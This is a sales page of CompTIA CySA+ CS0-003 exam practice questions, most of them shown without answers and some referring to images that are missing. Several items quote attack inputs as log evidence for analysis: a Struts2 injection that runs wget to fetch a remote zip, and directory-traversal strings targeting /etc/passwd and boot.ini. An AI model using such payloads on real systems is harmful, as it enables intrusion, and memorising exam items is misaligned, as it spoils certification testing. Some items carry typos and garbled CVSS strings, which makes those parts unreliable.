Special Summer Sale - 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: dm70dm

CS0-003 CompTIA CyberSecurity Analyst CySA+ Certification Exam Questions and Answers

Questions 4

An IT professional is reviewing the output from the top command in Linux. In this company, only IT and security staff are allowed to have elevated privileges. Both departments have confirmed they are not working on anything that requires elevated privileges. Based on the output below:

PID

USER

VIRT

RES

SHR

%CPU

%MEM

TIME+

COMMAND

34834

person

4980644

224288

111076

5.3

14.44

1:41.44

cinnamon

34218

person

51052

30920

23828

4.7

0.2

0:26.54

Xorg

2264

root

449628

143500

26372

14.0

3.1

0:12.38

bash

35963

xrdp

711940

42356

10560

2.0

0.2

0:06.81

xrdp

Which of the following PIDs is most likely to contribute to data exfiltration?

Options:

A.

2264

B.

34218

C.

34834

D.

35963

Buy Now
Questions 5

A security analyst identifies a device on which different malware was detected multiple times, even after the systems were scanned and cleaned several times. Which of the following actions would be most effective to ensure the device does not have residual malware?

Options:

A.

Update the device and scan offline in safe mode.

B.

Replace the hard drive and reimage the device.

C.

Upgrade the device to the latest OS version.

D.

Download a secondary scanner and rescan the device.

Buy Now
Questions 6

An auditor is reviewing an evidence log associated with a cybercrime. The auditor notices that a gap exists between individuals who were responsible for holding onto and transferring the evidence between individuals responsible for the investigation. Which of the following best describes the evidence handling process that was not properly followed?

Options:

A.

Validating data integrity

B.

Preservation

C.

Legal hold

D.

Chain of custody

Buy Now
Questions 7

Which of the following documents sets requirements and metrics for a third-party response during an event?

Options:

A.

BIA

B.

DRP

C.

SLA

D.

MOU

Buy Now
Questions 8

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

Options:

A.

Nmap

B.

TCPDump

C.

SIEM

D.

EDR

Buy Now
Questions 9

An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?

Options:

A.

Scope

B.

Weaponization

C.

CVSS

D.

Asset value

Buy Now
Questions 10

An analyst finds that an IP address outside of the company network that is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?

Options:

A.

Exploitation

B.

Reconnaissance

C.

Command and control

D.

Actions on objectives

Buy Now
Questions 11

An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has allowed the attacker to prioritize possible next targets. Which of the following is this an example of?

Options:

A.

Passive network foot printing

B.

OS fingerprinting

C.

Service port identification

D.

Application versioning

Buy Now
Questions 12

An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (Select two).

Options:

A.

Ensure users the document system recovery plan prior to deployment.

B.

Perform a full system-level backup following the change.

C.

Leverage an audit tool to identify changes that are being made.

D.

Identify assets with dependence that could be impacted by the change.

E.

Require diagrams to be completed for all critical systems.

F.

Ensure that all assets are properly listed in the inventory management system.

Buy Now
Questions 13

A security analyst is reviewing the logs of a web server and notices that an attacker has attempted to exploit a SQL injection vulnerability. Which of the following tools can the analyst use to analyze the attack and prevent future attacks?

Options:

A.

A web application firewall

B.

A network intrusion detection system

C.

A vulnerability scanner

D.

A web proxy

Buy Now
Questions 14

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

Options:

A.

function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }

B.

function x() { info=$(geoiplookup $1) && echo “$1 | $info” }

C.

function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }

D.

function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

Buy Now
Questions 15

Several reports with sensitive information are being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?

Options:

A.

Implement step-up authentication for administrators.

B.

Improve employee training and awareness.

C.

Increase password complexity standards.

D.

Deploy mobile device management.

Buy Now
Questions 16

While reviewing the web server logs, a security analyst notices the following snippet:

.. \ .. / .. \ .. /boot.ini

Which of the following Is belng attempted?

Options:

A.

Directory traversal

B.

Remote file inclusion

C.

Cross-site scripting

D.

Remote code execution

E.

Enumeration of /etc/passwd

Buy Now
Questions 17

Which of the following are process improvements that can be realized by implementing a SOAR solution? (Select two).

Options:

A.

Minimize security attacks

B.

Itemize tasks for approval

C.

Reduce repetitive tasks

D.

Minimize setup complexity

E.

Define a security strategy

F.

Generate reports and metrics

Buy Now
Questions 18

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

Options:

A.

Log retention

B.

Log rotation

C.

Maximum log size

D.

Threshold value

Buy Now
Questions 19

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

Options:

A.

Hacktivist threat

B.

Advanced persistent threat

C.

Unintentional insider threat

D.

Nation-state threat

Buy Now
Questions 20

A security manager is looking at a third-party vulnerability metric (SMITTEN) to improve upon the company's current method that relies on CVSSv3. Given the following:

CS0-003 Question 20

Which of the following vulnerabilities should be prioritized?

Options:

A.

Vulnerability 1

B.

Vulnerability 2

C.

Vulnerability 3

D.

Vulnerability 4

Buy Now
Questions 21

A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?

Options:

A.

Testing

B.

Implementation

C.

Validation

D.

Rollback

Buy Now
Questions 22

Which of the following responsibilities does the legal team have during an incident management event? (Select two).

Options:

A.

Coordinate additional or temporary staffing for recovery efforts.

B.

Review and approve new contracts acquired as a result of an event.

C.

Advise the Incident response team on matters related to regulatory reporting.

D.

Ensure all system security devices and procedures are in place.

E.

Conduct computer and network damage assessments for insurance.

F.

Verify that all security personnel have the appropriate clearances.

Buy Now
Questions 23

During a recent site survey. an analyst discovered a rogue wireless access point on the network. Which of the following actions should be taken first to protect the network while preserving evidence?

Options:

A.

Run a packet sniffer to monitor traffic to and from the access point.

B.

Connect to the access point and examine its log files.

C.

Identify who is connected to the access point and attempt to find the attacker.

D.

Disconnect the access point from the network

Buy Now
Questions 24

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?

Options:

A.

The NTP server is not configured on the host.

B.

The cybersecurity analyst is looking at the wrong information.

C.

The firewall is using UTC time.

D.

The host with the logs is offline.

Buy Now
Questions 25

An analyst is evaluating the following vulnerability report:

CS0-003 Question 25

Which of the following vulnerability report sections provides information about the level of impact on data confidentiality if a successful exploitation occurs?

Options:

A.

Payloads

B.

Metrics

C.

Vulnerability

D.

Profile

Buy Now
Questions 26

A security analyst reviews the following extract of a vulnerability scan that was performed against the web server:

Which of the following recommendations should the security analyst provide to harden the web server?

Options:

A.

Remove the version information on http-server-header.

B.

Disable tcp_wrappers.

C.

Delete the /wp-login.php folder.

D.

Close port 22.

Buy Now
Questions 27

An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and performs cleanup routines on it infected hosts, including deletion of initial dropper and removal of event log entries and prefetch files from the host. Which of the following data sources would most likely reveal evidence of the root cause?

(Select two).

Options:

A.

Creation time of dropper

B.

Registry artifacts

C.

EDR data

D.

Prefetch files

E.

File system metadata

F.

Sysmon event log

Buy Now
Questions 28

A cybersecurity analyst is recording the following details

* ID

* Name

* Description

* Classification of information

* Responsible party

In which of the following documents is the analyst recording this information?

Options:

A.

Risk register

B.

Change control documentation

C.

Incident response playbook

D.

Incident response plan

Buy Now
Questions 29

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?

Options:

A.

CDN

B.

Vulnerability scanner

C.

DNS

D.

Web server

Buy Now
Questions 30

A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?

Options:

A.

Geoblock the offending source country

B.

Block the IP range of the scans at the network firewall.

C.

Perform a historical trend analysis and look for similar scanning activity.

D.

Block the specific IP address of the scans at the network firewall

Buy Now
Questions 31

A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review?

Options:

A.

Cyber Threat Intelligence

B.

Common Vulnerabilities and Exposures

C.

Cyber Analytics Repository

D.

ATT&CK

Buy Now
Questions 32

An analyst is reviewing a vulnerability report for a server environment with the following entries:

CS0-003 Question 32

Which of the following systems should be prioritized for patching first?

Options:

A.

10.101.27.98

B.

54.73.225.17

C.

54.74.110.26

D.

54.74.110.228

Buy Now
Questions 33

A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve

this issue?

Options:

A.

Credentialed scan

B.

External scan

C.

Differential scan

D.

Network scan

Buy Now
Questions 34

Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?

Options:

A.

Isolate Joe's PC from the network

B.

Reimage the PC based on standard operating procedures

C.

Initiate a remote wipe of Joe's PC using mobile device management

D.

Perform no action until HR or legal counsel advises on next steps

Buy Now
Questions 35

A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes and unusual network traffic. Which of the following incident response steps should be performed next?

Options:

A.

Preparation

B.

Validation

C.

Containment

D.

Eradication

Buy Now
Questions 36

While configuring a SIEM for an organization, a security analyst is having difficulty correlating incidents across different systems. Which of the following should be checked first?

Options:

A.

If appropriate logging levels are set

B.

NTP configuration on each system

C.

Behavioral correlation settings

D.

Data normalization rules

Buy Now
Questions 37

Which of the following best describes the key elements of a successful information security program?

Options:

A.

Business impact analysis, asset and change management, and security communication plan

B.

Security policy implementation, assignment of roles and responsibilities, and information asset classification

C.

Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies

D.

Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems

Buy Now
Questions 38

A security analyst reviews the following Arachni scan results for a web application that stores PII data:

CS0-003 Question 38

Which of the following should be remediated first?

Options:

A.

SQL injection

B.

RFI

C.

XSS

D.

Code injection

Buy Now
Questions 39

Which of the following describes the best reason for conducting a root cause analysis?

Options:

A.

The root cause analysis ensures that proper timelines were documented.

B.

The root cause analysis allows the incident to be properly documented for reporting.

C.

The root cause analysis develops recommendations to improve the process.

D.

The root cause analysis identifies the contributing items that facilitated the event

Buy Now
Questions 40

A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below:

CS0-003 Question 40

Which of the following vulnerability types is the security analyst validating?

Options:

A.

Directory traversal

B.

XSS

C.

XXE

D.

SSRF

Buy Now
Questions 41

Security analysts review logs on multiple servers on a daily basis. Which of the following implementations will give the best central visibility into the events occurring throughout the corporate environment without logging in to the servers individually?

Options:

A.

Deploy a database to aggregate the logging.

B.

Configure the servers to forward logs to a SIEM-

C.

Share the log directory on each server to allow local access,

D.

Automate the emailing of logs to the analysts.

Buy Now
Questions 42

Approximately 100 employees at your company have received a Phishing email. AS a security analyst. you have been tasked with handling this Situation.

CS0-003 Question 42

CS0-003 Question 42

CS0-003 Question 42

Review the information provided and determine the following:

1. HOW many employees Clicked on the link in the Phishing email?

2. on how many workstations was the malware installed?

3. what is the executable file name of the malware?

CS0-003 Question 42

Options:

Buy Now
Questions 43

A security analyst would like to integrate two different SaaS-based security tools so that one tool can notify the other in the event a threat is detected. Which of the following should the analyst utilize to best accomplish this goal?

Options:

A.

SMB share

B.

API endpoint

C.

SMTP notification

D.

SNMP trap

Buy Now
Questions 44

An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next?

Options:

A.

Take a snapshot of the compromised server and verify its integrity

B.

Restore the affected server to remove any malware

C.

Contact the appropriate government agency to investigate

D.

Research the malware strain to perform attribution

Buy Now
Questions 45

A threat hunter seeks to identify new persistence mechanisms installed in an organization's environment. In collecting scheduled tasks from all enterprise workstations, the following host details are aggregated:

Which of the following actions should the hunter perform first based on the details above?

Options:

A.

Acquire a copy of taskhw.exe from the impacted host

B.

Scan the enterprise to identify other systems with taskhw.exe present

C.

Perform a public search for malware reports on taskhw.exe.

D.

Change the account that runs the -caskhw. exe scheduled task

Buy Now
Questions 46

Numerous emails were sent to a company's customer distribution list. The customers reported that the emails contained a suspicious link. The company's SOC determined the links were malicious. Which of the following is the best way to decrease these emails?

Options:

A.

DMARC

B.

DKIM

C.

SPF

D.

SMTP

Buy Now
Questions 47

A SOC analyst determined that a significant number of the reported alarms could be closed after removing the duplicates. Which of the following could help the analyst reduce the number of alarms with the least effort?

Options:

A.

SOAR

B.

API

C.

XDR

D.

REST

Buy Now
Questions 48

An incident response team member is triaging a Linux server. The output is shown below:

$ cat /etc/passwd

root:x:0:0::/:/bin/zsh

bin:x:1:1::/:/usr/bin/nologin

daemon:x:2:2::/:/usr/bin/nologin

mail:x:8:12::/var/spool/mail:/usr/bin/nologin

https:x:33:33::/srv/https:/bin/bash

nobody:x:65534:65534:Nobody:/:/usr/bin/nologin

git:x:972:972:git daemon user:/:/usr/bin/git-shell

$ cat /var/log/httpd

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:241)

at org.apache.catalina.core.ApplicationFilterChain.internaDoFilter(ApplicationFilterChain.java:208)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:316)

at org.java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)

WARN [struts2.dispatcher.multipart.JakartaMultipartRequest] Unable to parse request container.getlnstance.(#wget https://grohl.ve.da/tmp/brkgtr.zip;#whoami)

at org.apache.commons.fileupload.FileUploadBase$FileUploadBase$FileItemIteratorImpl.(FileUploadBase.java:947) at org.apache.commons.fileupload.FileUploadBase.getItemiterator(FileUploadBase.java:334)

at org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultiPartRequest.java:188) org.apache.struts2.dispatcher.multipart.JakartaMultipartRequest.parseRequest(JakartaMultipartRequest.java:423)

Which of the following is the adversary most likely trying to do?

Options:

A.

Create a backdoor root account named zsh.

B.

Execute commands through an unsecured service account.

C.

Send a beacon to a command-and-control server.

D.

Perform a denial-of-service attack on the web server.

Buy Now
Questions 49

The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select?

Options:

A.

PCI DSS

B.

COBIT

C.

ISO 27001

D.

ITIL

Buy Now
Questions 50

A company recently experienced a security incident. The security team has determined

a user clicked on a link embedded in a phishing email that was sent to the entire company. The link resulted in a malware download, which was subsequently installed and run.

INSTRUCTIONS

Part 1

Review the artifacts associated with the security incident. Identify the name of the malware, the malicious IP address, and the date and time when the malware executable entered the organization.

Part 2

Review the kill chain items and select an appropriate control for each that would improve the security posture of the organization and would have helped to prevent this incident from occurring. Each

control may only be used once, and not all controls will be used.

CS0-003 Question 50

Firewall log:

CS0-003 Question 50

CS0-003 Question 50

File integrity Monitoring Report:

CS0-003 Question 50

CS0-003 Question 50

Malware domain list:

CS0-003 Question 50

Vulnerability Scan Report:

CS0-003 Question 50

CS0-003 Question 50

Phishing Email:

CS0-003 Question 50

CS0-003 Question 50

Options:

Buy Now
Questions 51

Which of the following risk management decisions should be considered after evaluating all other options?

Options:

A.

Transfer

B.

Acceptance

C.

Mitigation

D.

Avoidance

Buy Now
Questions 52

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

Options:

A.

TO provide metrics and test continuity controls

B.

To verify the roles of the incident response team

C.

To provide recommendations for handling vulnerabilities

D.

To perform tests against implemented security controls

Buy Now
Questions 53

When starting an investigation, which of the following must be done first?

Options:

A.

Notify law enforcement

B.

Secure the scene

C.

Seize all related evidence

D.

Interview the witnesses

Buy Now
Questions 54

An analyst reviews the following web server log entries:

%2E%2E/%2E%2E/%2ES2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd

No attacks or malicious attempts have been discovered. Which of the following most likely describes what took place?

Options:

A.

A SQL injection query took place to gather information from a sensitive file.

B.

A PHP injection was leveraged to ensure that the sensitive file could be accessed.

C.

Base64 was used to prevent the IPS from detecting the fully encoded string.

D.

Directory traversal was performed to obtain a sensitive file for further reconnaissance.

Buy Now
Questions 55

A security team is concerned about recent Layer 4 DDoS attacks against the company website. Which of the following controls would best mitigate the attacks?

Options:

A.

Block the attacks using firewall rules.

B.

Deploy an IPS in the perimeter network.

C.

Roll out a CDN.

D.

Implement a load balancer.

Buy Now
Questions 56

A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:

Security Policy 1006: Vulnerability Management

1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.

2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.

3. The Company shall prioritize patching of publicly available systems and services over patching of internally available system.

According to the security policy, which of the following vulnerabilities should be the highest priority to patch?

A)

CS0-003 Question 56

B)

CS0-003 Question 56

C)

CS0-003 Question 56

D)

CS0-003 Question 56

Options:

A.

Option A

B.

Option B

C.

Option C

D.

Option D

Buy Now
Questions 57

A systems administrator is reviewing after-hours traffic flows from data center servers and sees regular, outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?

Options:

A.

Command-and-control beaconing activity

B.

Data exfiltration

C.

Anomalous activity on unexpected ports

D.

Network host IP address scanning

E.

A rogue network device

Buy Now
Questions 58

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

CS0-003 Question 58

Which of the following tuning recommendations should the security analyst share?

Options:

A.

Set an Http Only flag to force communication by HTTPS.

B.

Block requests without an X-Frame-Options header.

C.

Configure an Access-Control-Allow-Origin header to authorized domains.

D.

Disable the cross-origin resource sharing header.

Buy Now
Questions 59

An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:

• created the initial evidence log.

• disabled the wireless adapter on the device.

• interviewed the employee, who was unable to identify the website that was accessed

• reviewed the web proxy traffic logs.

Which of the following should the analyst do to remediate the infected device?

Options:

A.

Update the system firmware and reimage the hardware.

B.

Install an additional malware scanner that will send email alerts to the analyst.

C.

Configure the system to use a proxy server for Internet access.

D.

Delete the user profile and restore data from backup.

Buy Now
Questions 60

An organization utilizes multiple vendors, each with its own portal that a security analyst must sign in to daily. Which of the following is the best solution for the organization to use to eliminate the need for multiple authentication credentials?

Options:

A.

API

B.

MFA

C.

SSO

D.

VPN

Buy Now
Questions 61

A security analyst runs the following command:

# nmap -T4 -F 192.168.30.30

Starting nmap 7.6

Host is up (0.13s latency)

PORT STATE SERVICE

23/tcp open telnet

443/tcp open https

636/tcp open ldaps

Which of the following should the analyst recommend first to harden the system?

Options:

A.

Disable all protocols that do not use encryption.

B.

Configure client certificates for domain services.

C.

Ensure that this system is behind a NGFW.

D.

Deploy a publicly trusted root CA for secure websites.

Buy Now
Questions 62

A security analyst noticed the following entry on a web server log:

Warning: fopen (https://127.0.0.1:16) : failed to open stream:

Connection refused in /hj/var/www/showimage.php on line 7

Which of the following malicious activities was most likely attempted?

Options:

A.

XSS

B.

CSRF

C.

SSRF

D.

RCE

Buy Now
Questions 63

A security analyst needs to prioritize vulnerabilities for patching. Given the following vulnerability and system information:

CS0-003 Question 63

Which of the following systems should the analyst patch first?

Options:

A.

System 1

B.

System 2

C.

System 3

D.

System 4

E.

System 5

F.

System 6

Buy Now
Questions 64

Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization's endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor's actions?

Options:

A.

Delivery

B.

Reconnaissance

C.

Exploitation

D.

Weaponizatign

Buy Now
Questions 65

The vulnerability analyst reviews threat intelligence regarding emerging vulnerabilities affecting workstations that are used within the company:

CS0-003 Question 65

Which of the following vulnerabilities should the analyst be most concerned about, knowing that end users frequently click on malicious links sent via email?

Options:

A.

Vulnerability A

B.

Vulnerability B

C.

Vulnerability C

D.

Vulnerability D

Buy Now
Questions 66

An analyst is reviewing system logs while threat hunting:

CS0-003 Question 66

Which of the following hosts should be investigated first?

Options:

A.

PC1

B.

PC2

C.

PC3

D.

PC4

E.

PC5

Buy Now
Questions 67

A company is deploying new vulnerability scanning software to assess its systems. The current network is highly segmented, and the networking team wants to minimize the number of unique firewall rules. Which of the following scanning techniques would be most efficient to achieve the objective?

Options:

A.

Deploy agents on all systems to perform the scans.

B.

Deploy a central scanner and perform non-credentialed scans.

C.

Deploy a cloud-based scanner and perform a network scan.

D.

Deploy a scanner sensor on every segment and perform credentialed scans.

Buy Now
Questions 68

A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability. Which of the following CVE metrics would be most accurate for this zero-day threat?

Options:

A.

CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/1: K/A: L

B.

CVSS:31/AV:K/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L

C.

CVSS:31/AV:N/AC:L/PR:N/UI:H/S:U/C:L/I:N/A:H

D.

CVSS:31/AV:L/AC:L/PR:R/UI:R/S:U/C:H/I:L/A:H

Buy Now
Questions 69

A security analyst performs various types of vulnerability scans. Review the vulnerability scan results to determine the type of scan that was executed and if a false positive occurred for each device.

Instructions:

Select the Results Generated drop-down option to determine if the results were generated from a credentialed scan, non-credentialed scan, or a compliance scan.

For ONLY the credentialed and non-credentialed scans, evaluate the results for false positives and check the findings that display false positives. NOTE: If you would like to uncheck an option that is currently selected, click on the option a second time.

Lastly, based on the vulnerability scan results, identify the type of Server by dragging the Server to the results.

The Linux Web Server, File-Print Server and Directory Server are draggable.

If at any time you would like to bring back the initial state of the simulation, please select the Reset All button. When you have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue.

CS0-003 Question 69

CS0-003 Question 69

Options:

Buy Now
Questions 70

An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?

Options:

A.

Disable the user's network account and access to web resources

B.

Make a copy of the files as a backup on the server.

C.

Place a legal hold on the device and the user's network share.

D.

Make a forensic image of the device and create a SRA-I hash.

Buy Now
Questions 71

A security administrator has found indications of dictionary attacks against the company's external-facing portal. Which of the following should be implemented to best mitigate the password attacks?

Options:

A.

Multifactor authentication

B.

Password complexity

C.

Web application firewall

D.

Lockout policy

Buy Now
Questions 72

To minimize the impact of a security incident in a heavily regulated company, a cybersecurity analyst has configured audit settings in the organization's cloud services. Which of the following security controls has the analyst configured?

Options:

A.

Preventive

B.

Corrective

C.

Directive

D.

Detective

Buy Now
Questions 73

A security analyst observed the following activity from a privileged account:

. Accessing emails and sensitive information

. Audit logs being modified

. Abnormal log-in times

Which of the following best describes the observed activity?

Options:

A.

Irregular peer-to-peer communication

B.

Unauthorized privileges

C.

Rogue devices on the network

D.

Insider attack

Buy Now
Questions 74

An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?

Options:

A.

Disable administrative accounts for any operations.

B.

Implement MFA requirements for all internal resources.

C.

Harden systems by disabling or removing unnecessary services.

D.

Implement controls to block execution of untrusted applications.

Buy Now
Questions 75

A security administrator needs to import Pll data records from the production environment to the test environment for testing purposes. Which of the following would best protect data confidentiality?

Options:

A.

Data masking

B.

Hashing

C.

Watermarking

D.

Encoding

Buy Now
Questions 76

In the last hour, a high volume of failed RDP authentication attempts has been logged on a critical server. All of the authentication attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following mitigating controls would be most effective to reduce the rate of success of this brute-force attack? (Select two).

Options:

A.

Increase the granularity of log-on event auditing on all devices.

B.

Enable host firewall rules to block all outbound traffic to TCP port 3389.

C.

Configure user account lockout after a limited number of failed attempts.

D.

Implement a firewall block for the IP address of the remote system.

E.

Install a third-party remote access tool and disable RDP on all devices.

F.

Block inbound to TCP port 3389 from untrusted remote IP addresses at the perimeter firewall.

Buy Now
Questions 77

During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?

Options:

A.

Isolation

B.

Remediation

C.

Reimaging

D.

Preservation

Buy Now
Questions 78

Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?

Options:

A.

Review Of security requirements

B.

Compliance checks

C.

Decomposing the application

D.

Security by design

Buy Now
Questions 79

An analyst wants to ensure that users only leverage web-based software that has been pre-approved by the organization. Which of the following should be deployed?

Options:

A.

Blocklisting

B.

Allowlisting

C.

Graylisting

D.

Webhooks

Buy Now
Questions 80

A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?

Options:

A.

Service-level agreement

B.

Business process interruption

C.

Degrading functionality

D.

Proprietary system

Buy Now
Questions 81

The management team requests monthly KPI reports on the company's cybersecurity program. Which of the following KPIs would identify how long a security threat goes unnoticed in the environment?

Options:

A.

Employee turnover

B.

Intrusion attempts

C.

Mean time to detect

D.

Level of preparedness

Buy Now
Questions 82

A security analyst found the following vulnerability on the company’s website:

Which of the following should be implemented to prevent this type of attack in the future?

Options:

A.

Input sanitization

B.

Output encoding

C.

Code obfuscation

D.

Prepared statements

Buy Now
Questions 83

An analyst has discovered the following suspicious command:

CS0-003 Question 83

Which of the following would best describe the outcome of the command?

Options:

A.

Cross-site scripting

B.

Reverse shell

C.

Backdoor attempt

D.

Logic bomb

Buy Now
Questions 84

A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?

Options:

A.

Implement segmentation with ACLs.

B.

Configure logging and monitoring to the SIEM.

C.

Deploy MFA to cloud storage locations.

D.

Roll out an IDS.

Buy Now
Questions 85

A security analyst received an alert regarding multiple successful MFA log-ins for a particular user When reviewing the authentication logs the analyst sees the following:

Which of the following are most likely occurring, based on the MFA logs? (Select two).

Options:

A.

Dictionary attack

B.

Push phishing

C.

impossible geo-velocity

D.

Subscriber identity module swapping

E.

Rogue access point

F.

Password spray

Buy Now
Questions 86

A Chief Information Security Officer wants to implement security by design, starting …… vulnerabilities, including SQL injection, FRI, XSS, etc. Which of the following would most likely meet the requirement?

Options:

A.

Reverse engineering

B.

Known environment testing

C.

Dynamic application security testing

D.

Code debugging

Buy Now
Questions 87

Which of the following best describes the importance of implementing TAXII as part of a threat intelligence program?

Options:

A.

It provides a structured way to gain information about insider threats.

B.

It proactively facilitates real-time information sharing between the public and private sectors.

C.

It exchanges messages in the most cost-effective way and requires little maintenance once implemented.

D.

It is a semi-automated solution to gather threat intellbgence about competitors in the same sector.

Buy Now
Questions 88

A Chief Information Security Officer wants to lock down the users' ability to change applications that are installed on their Windows systems. Which of the following is the best enterprise-level solution?

Options:

A.

HIPS

B.

GPO

C.

Registry

D.

DLP

Buy Now
Questions 89

Which of the following actions would an analyst most likely perform after an incident has been investigated?

Options:

A.

Risk assessment

B.

Root cause analysis

C.

Incident response plan

D.

Tabletop exercise

Buy Now
Questions 90

Given the following CVSS string-

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/3:U/C:K/I:K/A:H

Which of the following attributes correctly describes this vulnerability?

Options:

A.

A user is required to exploit this vulnerability.

B.

The vulnerability is network based.

C.

The vulnerability does not affect confidentiality.

D.

The complexity to exploit the vulnerability is high.

Buy Now
Questions 91

A security analyst wants to implement new monitoring controls in order to find abnormal account activity for traveling employees. Which of the following techniques would deliver the expected results?

Options:

A.

Malicious command interpretation

B.

Network monitoring

C.

User behavior analysis

D.

SSL inspection

Buy Now
Questions 92

During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?

Options:

A.

Shut down the server.

B.

Reimage the server

C.

Quarantine the server

D.

Update the OS to latest version.

Buy Now
Questions 93

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

Options:

A.

SIEM ingestion logs are reduced by 20%.

B.

Phishing alerts drop by 20%.

C.

False positive rates drop to 20%.

D.

The MTTR decreases by 20%.

Buy Now
Questions 94

Which of the following evidence collection methods is most likely to be acceptable in court cases?

Options:

A.

Copying all access files at the time of the incident

B.

Creating a file-level archive of all files

C.

Providing a full system backup inventory

D.

Providing a bit-level image of the hard drive

Buy Now
Questions 95

Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?

Options:

A.

Implementing credentialed scanning

B.

Changing from a passive to an active scanning approach

C.

Implementing a central place to manage IT assets

D.

Performing agentless scanning

Buy Now
Questions 96

Which of the following is a nation-state actor least likely to be concerned with?

Options:

A.

Detection by MITRE ATT&CK framework.

B.

Detection or prevention of reconnaissance activities.

C.

Examination of its actions and objectives.

D.

Forensic analysis for legal action of the actions taken

Buy Now
Questions 97

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

Options:

A.

Identify any improvements or changes in the incident response plan or procedures

B.

Determine if an internal mistake was made and who did it so they do not repeat the error

C.

Present all legal evidence collected and turn it over to iaw enforcement

D.

Discuss the financial impact of the incident to determine if security controls are well spent

Buy Now
Questions 98

Which of the following risk management principles is accomplished by purchasing cyber insurance?

Options:

A.

Accept

B.

Avoid

C.

Mitigate

D.

Transfer

Buy Now
Questions 99

